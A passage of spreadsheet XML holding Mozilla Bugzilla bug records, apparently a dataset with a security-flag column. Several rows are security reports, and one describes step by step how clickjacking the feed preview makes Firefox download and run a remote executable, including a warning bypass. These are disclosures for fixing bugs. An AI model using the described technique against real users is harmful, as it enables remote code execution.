      <c r="S568" t="inlineStr">
        <is>
          <t>3.45</t>
        </is>
      </c>
      <c r="T568" t="n">
        <v>1</v>
      </c>
      <c r="U568" t="n">
        <v>0</v>
      </c>
      <c r="V568" t="n">
        <v>18</v>
      </c>
      <c r="W568" t="inlineStr">
        <is>
          <t>Created attachment 9032424
p256_testcases.txt
Three testcases from Project Wycheproof for p256-ECDH cause segfaults in public key verification functions.
The testvector integration for p256-ECDH is not completed yet, so none of the wycheproof testvectors for p256-ECDH is runnning in CI yet. 
For now, the bug(s) can be reproduced by simply adding the three testcases to the testvector header file for the Curve25519 unittest. This test can handle the testvectors for p256 without any modification. 
&lt;&lt;&lt;&gt;&gt;&gt;
Steps to reproduce:
Checkout current version of NSS.
Add testvectors attached to this bug to gtests/common/testvectors/curve25519-vectors.h
Build NSS
run '../dist/Debug/bin/pk11_gtest --gtest_filter="*Curve25519*" '
&lt;&lt;&lt;&gt;&gt;&gt;
Expected Result
No test failures.
&lt;&lt;&lt;&gt;&gt;&gt;
Actual Result
segfault produced by each of the inserted p256 testcase(s) at line
https://searchfox.org/nss/rev/7bc70a3317b800aac07bad83e74b6c79a9ec5bff/lib/freebl/ec.c#451</t>
        </is>
      </c>
      <c r="X568" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="569">
      <c r="A569" t="n">
        <v>564747</v>
      </c>
      <c r="B569" t="inlineStr">
        <is>
          <t>2010-05-10 01:30:59 -0700</t>
        </is>
      </c>
      <c r="C569" t="inlineStr">
        <is>
          <t>talos-r3-fed64-006 needs setting up</t>
        </is>
      </c>
      <c r="D569" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E569" t="n">
        <v>1</v>
      </c>
      <c r="F569" t="n">
        <v>1</v>
      </c>
      <c r="G569" t="n">
        <v>5</v>
      </c>
      <c r="H569" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I569" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J569" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K569" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L569" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M569" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N569" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O569" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P569" t="inlineStr">
        <is>
          <t>[hardware][buildslaves]</t>
        </is>
      </c>
      <c r="Q569" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R569" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S569" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T569" t="n">
        <v>1</v>
      </c>
      <c r="U569" t="n">
        <v>0</v>
      </c>
      <c r="V569" t="n">
        <v>3</v>
      </c>
      <c r="W569" t="inlineStr">
        <is>
          <t>This one claims to the be fed64 ref platform. A machine with that name has done work up until 2010-04-13, but then disappeared. Possibly an early example of re-imaging for the problems in bug 561442, then hostname not set.
dupeme/thwapme if I missed the bug mail on this.</t>
        </is>
      </c>
      <c r="X569" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="570">
      <c r="A570" t="n">
        <v>1241037</v>
      </c>
      <c r="B570" t="inlineStr">
        <is>
          <t>2016-01-20 00:03:39 -0800</t>
        </is>
      </c>
      <c r="C570" t="inlineStr">
        <is>
          <t>sec_port_ucs2_utf8_conversion_function detects UTF-16 surrogates incorrectly</t>
        </is>
      </c>
      <c r="D570" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:16 -0800</t>
        </is>
      </c>
      <c r="E570" t="n">
        <v>1</v>
      </c>
      <c r="F570" t="n">
        <v>1</v>
      </c>
      <c r="G570" t="n">
        <v>3</v>
      </c>
      <c r="H570" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I570" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J570" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K570" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M570" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N570" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O570" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P570" t="inlineStr">
        <is>
          <t>[adv-main47+]</t>
        </is>
      </c>
      <c r="Q570" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R570" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S570" t="inlineStr">
        <is>
          <t>3.23</t>
        </is>
      </c>
      <c r="T570" t="n">
        <v>1</v>
      </c>
      <c r="U570" t="n">
        <v>0</v>
      </c>
      <c r="V570" t="n">
        <v>13</v>
      </c>
      <c r="W570" t="inlineStr">
        <is>
          <t>Found by visual inspection (ellipsis for clarity):
    324       else if( ((inBuf[i+0+H_0] &amp; 0xDC) == 0xD8) ) {
    325         if( ((inBuf[i+2+H_0] &amp; 0xDC) == 0xDC) …
These conditions are incorrect, as are similar ones later in the function.  The mask should be 0xFC; as written, this will misidentify anything between U+F800 and U+FBFF as a high surrogate and anything between U+FC00 and U+FFFF as a low surrogate.  This means that characters in the first range are usually considered invalid encodings, or if they occur before a character in the second range will be silently mistranslated.  (Arabic Presentation Forms occur in both of those ranges, incidentally.)
For some reason, unpaired low surrogates aren't rejected like unpaired high surrogates; they're just transcribed as-is into (equally invalid) UTF-8, so this doesn't affect un-"paired" instances of characters in the U+FC00 to U+FFFF range.
Not sure if this is really security-sensitive, but it looks like it's used by certificate processing, so I don't know if there's some way that a crafted certificate could be misinterpreted to assert something it shouldn't be.</t>
        </is>
      </c>
      <c r="X570" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="571">
      <c r="A571" t="n">
        <v>1563571</v>
      </c>
      <c r="B571" t="inlineStr">
        <is>
          <t>2019-07-04 09:44:05 -0700</t>
        </is>
      </c>
      <c r="C571" t="inlineStr">
        <is>
          <t>Configure fails for android build with "ERROR: Failed to find a linker" with --enable-release</t>
        </is>
      </c>
      <c r="D571" t="inlineStr">
        <is>
          <t>2022-01-10 05:01:14 -0800</t>
        </is>
      </c>
      <c r="E571" t="n">
        <v>1</v>
      </c>
      <c r="F571" t="n">
        <v>1</v>
      </c>
      <c r="G571" t="n">
        <v>7</v>
      </c>
      <c r="H571" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I571" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J571" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K571" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L571" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M571" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N571" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O571" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P571" t="inlineStr"/>
      <c r="Q571" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R571" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S571" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T571" t="n">
        <v>1</v>
      </c>
      <c r="U571" t="n">
        <v>0</v>
      </c>
      <c r="V571" t="n">
        <v>13</v>
      </c>
      <c r="W571" t="inlineStr">
        <is>
          <t>This is on a brand new PC so a fresh setup, so it's possible I'm missing some magic I had done to my old machine.
I checked out gecko, ran `./mach bootstrap` for android, then ran `./mach build`.
I get the following error:
&gt; 0:03.16 checking for linker...
&gt; 0:03.16 DEBUG: Executing: `/usr/bin/clang -std=gnu99 --target=arm-linux-androideabi -Wl,--version -isystem /home/jamie/.mozbuild/android-ndk-r17b/sysroot/usr/include/arm-linux-androideabi -isystem /home/jamie/.mozbuild/android-ndk-r17b/sysroot/usr/include -gcc-toolchain /home/jamie/.mozbuild/android-ndk-r17b/toolchains/arm-linux-androideabi-4.9/prebuilt/linux-x86_64 -D__ANDROID_API__=16`
&gt; 0:03.16 ERROR: Failed to find a linker
I had recently removed the CC and CXX lines from my mozconfig, as I'd read in bug 1561323 to do so. Adding them back in (to point to mozbuild's clang) makes the problem go away.
This is a reduced mozconfig which still triggers the bug:
&gt; ac_add_options --enable-application=mobile/android
&gt; ac_add_options --with-android-ndk="${HOME}/.mozbuild/android-ndk-r17b"
and adding this fixes it:
&gt; CC="${HOME}/.mozbuild/clang/bin/clang"
&gt; CXX="${HOME}/.mozbuild/clang/bin/clang++"</t>
        </is>
      </c>
      <c r="X571" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="572">
      <c r="A572" t="n">
        <v>557946</v>
      </c>
      <c r="B572" t="inlineStr">
        <is>
          <t>2010-04-07 16:25:51 -0700</t>
        </is>
      </c>
      <c r="C572" t="inlineStr">
        <is>
          <t>TM: Crash with malformed typemap in nested trees or "Assertion failure: *(JSObject**)slot == NULL, at ../jstracer.cpp"</t>
        </is>
      </c>
      <c r="D572" t="inlineStr">
        <is>
          <t>2013-12-10 09:59:43 -0800</t>
        </is>
      </c>
      <c r="E572" t="n">
        <v>1</v>
      </c>
      <c r="F572" t="n">
        <v>1</v>
      </c>
      <c r="G572" t="n">
        <v>3</v>
      </c>
      <c r="H572" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I572" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J572" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K572" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L572" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M572" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N572" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P572" t="inlineStr">
        <is>
          <t>[sg:critical][ccbr] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q572" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R572" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S572" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T572" t="n">
        <v>1</v>
      </c>
      <c r="U572" t="n">
        <v>0</v>
      </c>
      <c r="V572" t="n">
        <v>28</v>
      </c>
      <c r="W572" t="inlineStr">
        <is>
          <t>&lt;mwu&gt; dvander: http://developer.android.com/reference/java/util/concurrent/Future.html and then click on Exchanger&lt;V&gt; in the lower left frame (in classes)
I can reproduce this, but the trace is fairly complicated so I'm bisecting.</t>
        </is>
      </c>
      <c r="X572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="573">
      <c r="A573" t="n">
        <v>8849</v>
      </c>
      <c r="B573" t="inlineStr">
        <is>
          <t>1999-06-24 13:49:37 -0700</t>
        </is>
      </c>
      <c r="C573" t="inlineStr">
        <is>
          <t>[PP] [HELP WANTED] 1999-07-29 - Linux/RH5.2 may crash on startup.</t>
        </is>
      </c>
      <c r="D573" t="inlineStr">
        <is>
          <t>2000-06-28 11:22:37 -0700</t>
        </is>
      </c>
      <c r="E573" t="n">
        <v>1</v>
      </c>
      <c r="F573" t="n">
        <v>1</v>
      </c>
      <c r="G573" t="n">
        <v>3</v>
      </c>
      <c r="H573" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I573" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J573" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K573" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L573" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M573" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N573" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P573" t="inlineStr">
        <is>
          <t>Suggest dropping support for glibc2.0</t>
        </is>
      </c>
      <c r="Q573" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R573" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S573" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T573" t="n">
        <v>1</v>
      </c>
      <c r="U573" t="n">
        <v>0</v>
      </c>
      <c r="V573" t="n">
        <v>89</v>
      </c>
      <c r="W573" t="inlineStr">
        <is>
          <t>1999-06-24-12-m8 Linux rh5.2
The build is crashing on startup.  Happening on two of two machines tried within
the mailnewsqa group.  No stack trace.</t>
        </is>
      </c>
      <c r="X573" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="574">
      <c r="A574" t="n">
        <v>704315</v>
      </c>
      <c r="B574" t="inlineStr">
        <is>
          <t>2011-11-21 15:11:18 -0800</t>
        </is>
      </c>
      <c r="C574" t="inlineStr">
        <is>
          <t>Need Test Snippet Path For XUL nightly --&gt; Fennec Native Nightly Users</t>
        </is>
      </c>
      <c r="D574" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E574" t="n">
        <v>1</v>
      </c>
      <c r="F574" t="n">
        <v>1</v>
      </c>
      <c r="G574" t="n">
        <v>5</v>
      </c>
      <c r="H574" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I574" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J574" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K574" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L574" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M574" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N574" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P574" t="inlineStr"/>
      <c r="Q574" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R574" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S574" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T574" t="n">
        <v>1</v>
      </c>
      <c r="U574" t="n">
        <v>0</v>
      </c>
      <c r="V574" t="n">
        <v>7</v>
      </c>
      <c r="W574" t="inlineStr">
        <is>
          <t>Request for RelEng: We need a snippet for nightly users who use Fennec XUL today and will be soon accessing the new Fennec Native installs, instead.</t>
        </is>
      </c>
      <c r="X574" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="575">
      <c r="A575" t="n">
        <v>1448971</v>
      </c>
      <c r="B575" t="inlineStr">
        <is>
          <t>2018-03-26 11:10:00 -0700</t>
        </is>
      </c>
      <c r="C575" t="inlineStr">
        <is>
          <t>Replace "when Firefox starts" section in about:preferences#general with checkbox</t>
        </is>
      </c>
      <c r="D575" t="inlineStr">
        <is>
          <t>2019-05-22 16:14:34 -0700</t>
        </is>
      </c>
      <c r="E575" t="n">
        <v>1</v>
      </c>
      <c r="F575" t="n">
        <v>1</v>
      </c>
      <c r="G575" t="n">
        <v>2</v>
      </c>
      <c r="H575" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I575" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J575" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K575" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L575" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M575" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N575" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P575" t="inlineStr">
        <is>
          <t>[strings m-c needed] [has-pr]</t>
        </is>
      </c>
      <c r="Q575" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R575" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S575" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T575" t="n">
        <v>1</v>
      </c>
      <c r="U575" t="n">
        <v>0</v>
      </c>
      <c r="V575" t="n">
        <v>22</v>
      </c>
      <c r="W575" t="inlineStr">
        <is>
          <t>The "Startup" section should have a checkbox that reads "Restore Previous Session", which should replace the "when firefox starts" section. This is a follow-up to landing the home section in about:preferences.</t>
        </is>
      </c>
      <c r="X575" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="576">
      <c r="A576" t="n">
        <v>1079658</v>
      </c>
      <c r="B576" t="inlineStr">
        <is>
          <t>2014-10-07 21:34:00 -0700</t>
        </is>
      </c>
      <c r="C576" t="inlineStr">
        <is>
          <t>Critical id-pkix-ocsp-nocheck extension in an OCSP delegated responder certificate causes OCSP response verification to fail</t>
        </is>
      </c>
      <c r="D576" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:40 -0700</t>
        </is>
      </c>
      <c r="E576" t="n">
        <v>1</v>
      </c>
      <c r="F576" t="n">
        <v>1</v>
      </c>
      <c r="G576" t="n">
        <v>3</v>
      </c>
      <c r="H576" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I576" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J576" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K576" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M576" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N576" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P576" t="inlineStr">
        <is>
          <t>[adv-main35+]</t>
        </is>
      </c>
      <c r="Q576" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R576" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S576" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T576" t="n">
        <v>1</v>
      </c>
      <c r="U576" t="n">
        <v>0</v>
      </c>
      <c r="V576" t="n">
        <v>24</v>
      </c>
      <c r="W576" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]:
We currently treat all delegated OCSP responder certificates as if they had id-pkix-ocsp-nocheck, but we don't recognize the id-pkix-ocsp-nocheck extension. This causes problems if the id-pkix-ocsp-nocheck extension is present in the delegated response signer certificate.
This could be a security issue because we'll throw away any Revoked/Unknown response that was  signed by such a certificate.
This should be easy to fix: Just add the logic for the extension to pkixcert.cpp's BackCert::RememberExtension. We actually don't need to remember its value because we don't do anything with it.</t>
        </is>
      </c>
      <c r="X576" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="577">
      <c r="A577" t="n">
        <v>1422231</v>
      </c>
      <c r="B577" t="inlineStr">
        <is>
          <t>2017-11-30 21:26:58 -0800</t>
        </is>
      </c>
      <c r="C577" t="inlineStr">
        <is>
          <t>RCE potential by abusing embedded feed preview + click jacking</t>
        </is>
      </c>
      <c r="D577" t="inlineStr">
        <is>
          <t>2024-05-30 09:39:14 -0700</t>
        </is>
      </c>
      <c r="E577" t="n">
        <v>1</v>
      </c>
      <c r="F577" t="n">
        <v>1</v>
      </c>
      <c r="G577" t="n">
        <v>6</v>
      </c>
      <c r="H577" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I577" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J577" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K577" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L577" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M577" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N577" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P577" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main64+]</t>
        </is>
      </c>
      <c r="Q577" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R577" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S577" t="inlineStr">
        <is>
          <t>Firefox 64</t>
        </is>
      </c>
      <c r="T577" t="n">
        <v>1</v>
      </c>
      <c r="U577" t="n">
        <v>0</v>
      </c>
      <c r="V577" t="n">
        <v>17</v>
      </c>
      <c r="W577" t="inlineStr">
        <is>
          <t>Created attachment 8933553
feedrce.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
Tested on latest Nightly v59.0a1 (2017-11-30) (64-bit)
Using PoC attached:
1. Click on first button from the top, this will copy our malicious executable (in this case its my own hosted batch file that simply opens calc)
2. Click on the second button, you should see a drop down menu appear, here you choose the 'Choose Application..' option.
3. After a file picker appears, simply paste the URL copied in step1 and hit 'open'
4. Finally, click the last button.
Actual results:
Firefox has its own preview feed reader for files with the type "application/vnd.mozilla.maybe.feed". Within it, a user could choose a custom application to subscriber to the feed you're viewing. 
When choosing a custom app, a filepicker appears which we can feed an http url into it and after clicking 'open' the remote file will be downloaded into a local temporary folder. Finally, if the user clicks on the 'subscribe' button, the downloaded file will be executed.
In the PoC, we embed the feed preview in order to clickjack a potential victim into executing attacker executable file.
These files have mark of the web and so an initial 'unknown publisher' dialog warning does appear. Though we can bypass this by having a .jar file downloaded instead. Although its good that windows' mark of the web warnings appear for most executables, its not far fetched to bypass this with either a stolen cert or some bug in windows.
Expected results:
One or more of the following:
1. Disable feed preview on embedded feed files (or at least the part that allows custom apps).
2. Prevent file picker from downloading remote files (though this may be a windows unique problem)
3. Add whitelist of directories allowed to contain custom feed reader apps. (or blacklist temp web download folder)
Admittedly this requires high user interaction but keep in mind this highlights a bigger problem, that is that the feed previewer could be used for download&amp;exec exploits. This can turn a uXSS into a full RCE. (I'm assuming here that if one can execute JS within feed preview pages, they could use it to 'fake' a custom app subscription which is essentially download&amp;exec as described here)</t>
        </is>
      </c>
      <c r="X577" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="578">
      <c r="A578" t="n">
        <v>1136869</v>
      </c>
      <c r="B578" t="inlineStr">
        <is>
          <t>2015-02-25 11:59:47 -0800</t>
        </is>
      </c>
      <c r="C578" t="inlineStr">
        <is>
          <t>job updates on vagrant fail with 500 error</t>
        </is>
      </c>
      <c r="D578" t="inlineStr">
        <is>
          <t>2015-05-20 04:33:31 -0700</t>
        </is>
      </c>
      <c r="E578" t="n">
        <v>1</v>
      </c>
      <c r="F578" t="n">
        <v>1</v>
      </c>
      <c r="G578" t="n">
        <v>7</v>
      </c>
      <c r="H578" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I578" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J578" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N578" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P578" t="inlineStr"/>
      <c r="Q578" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R578" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S578" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T578" t="n">
        <v>1</v>
      </c>
      <c r="U578" t="n">
        <v>0</v>
      </c>
      <c r="V578" t="n">
        <v>10</v>
      </c>
      <c r="W578" t="inlineStr">
        <is>
          <t>Get this error when sitting on the page and these job update endpoints are hit:
http://local.treeherder.mozilla.org/api/project/try/jobs/?count=2000&amp;last_modified__gt=2015-02-25T00:19:09.000Z&amp;result_set_id__in=3,1,2,13,35,37,7,24,10,5&amp;return_type=list
Warning: Incorrect datetime value: '2015-02-25T00:19:09.000Z' for column 'last_modified' at row 1</t>
        </is>
      </c>
      <c r="X578" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="579">
      <c r="A579" t="n">
        <v>526471</v>
      </c>
      <c r="B579" t="inlineStr">
        <is>
          <t>2009-11-04 05:45:13 -0800</t>
        </is>
      </c>
      <c r="C579" t="inlineStr">
        <is>
          <t>XML has no ID nor domain</t>
        </is>
      </c>
      <c r="D579" t="inlineStr">
        <is>
          <t>2013-03-19 19:08:55 -0700</t>
        </is>
      </c>
      <c r="E579" t="n">
        <v>1</v>
      </c>
      <c r="F579" t="n">
        <v>1</v>
      </c>
      <c r="G579" t="n">
        <v>4</v>
      </c>
      <c r="H579" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I579" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J579" t="inlineStr">
        <is>
          <t>ISPDB Server</t>
        </is>
      </c>
      <c r="K579" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N579" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P579" t="inlineStr"/>
      <c r="Q579" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R579" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S579" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T579" t="n">
        <v>1</v>
      </c>
      <c r="U579" t="n">
        <v>0</v>
      </c>
      <c r="V579" t="n">
        <v>4</v>
      </c>
      <c r="W579" t="inlineStr">
        <is>
          <t>Reproduction:
1. Enter a new config, with one or more domains
2. Submit
3. Click on the link to the XML
4. Compare with &lt;https://wiki.mozilla.org/Thunderbird:Autoconfiguration:ConfigFileFormat&gt;
Actual result:
  &lt;emailProvider id=""&gt;
    ...
    &lt;emailProviderId/&gt;
    ...
&lt;http://ispdb.mozillamessaging.com/details/55&gt; -&gt;
&lt;http://ispdb.mozillamessaging.com/export_xml/55&gt;
Expected result:
  &lt;emailProvider id="example.com"&gt;
    &lt;domain&gt;example.com&lt;/domain&gt;
    &lt;domain&gt;example.co.uk&lt;/domain&gt;
    &lt;domain&gt;example.de&lt;/domain&gt;
    ...
Note:
This worked better for older domains (originally imported manually from my manually created XML files?):
&lt;http://ispdb.mozillamessaging.com/export_xml/3&gt; -&gt; &lt;http://ispdb.mozillamessaging.com/details/3&gt;
That also had no &lt;domain&gt;, but at least an &lt;emailProvider id&gt;</t>
        </is>
      </c>
      <c r="X579" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="580">
      <c r="A580" t="n">
        <v>619648</v>
      </c>
      <c r="B580" t="inlineStr">
        <is>
          <t>2010-12-16 01:49:14 -0800</t>
        </is>
      </c>
      <c r="C580" t="inlineStr">
        <is>
          <t>[SECURITY] XSS via summary in "possible duplicates" table due to lack of encoding by YUI</t>
        </is>
      </c>
      <c r="D580" t="inlineStr">
        <is>
          <t>2013-01-28 10:07:29 -0800</t>
        </is>
      </c>
      <c r="E580" t="n">
        <v>1</v>
      </c>
      <c r="F580" t="n">
        <v>1</v>
      </c>
      <c r="G580" t="n">
        <v>4</v>
      </c>
      <c r="H580" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I580" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J580" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K580" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="L580" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M580" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N580" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O580" t="inlineStr">
